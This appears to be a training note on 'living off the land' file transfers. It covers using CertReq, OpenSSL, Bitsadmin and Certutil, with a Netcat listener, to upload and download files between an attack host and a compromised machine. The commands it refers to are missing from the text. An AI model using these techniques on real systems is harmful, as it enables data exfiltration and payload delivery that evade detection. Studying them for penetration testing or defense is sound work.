☑️Living Off The Land

There are currently two website that aggregate information related to LOLBins (Living Off The Land BInaries)

• LOLBAS Project for Windows Binaries

• GTFOBins for Linux Binaries

LOLBAS

We can search /download /upload:

Let's use CertReq.exe as an example.

We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.

So we start a listener first:

Then we uplaod win.ini to our attack machine:

GTFOBins

To search for the download and upload function in GTFOBins for Linux Binaries, we can use +file download or +file upload.

Let's use OpenSSL. It's frequently installed and often included in other software distributions, with sysadmins using it to generate security certificates, among other tasks. OpenSSL can be used to send files "nc style."

We need to create a certificate and start a server in our attack machine.

Now standing up the server in our attack machine:

Next, with the server running we need to download the file from the compromised machine:

Other Common LOL Tools

Bitsadmin Download function

The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It "intelligently" checks host and network utilization into account to minimize the impact on a user's foreground work.

Downloading a file using Bitsadmin:

Certutil

Casey Smith (@subTee) found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a defacto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.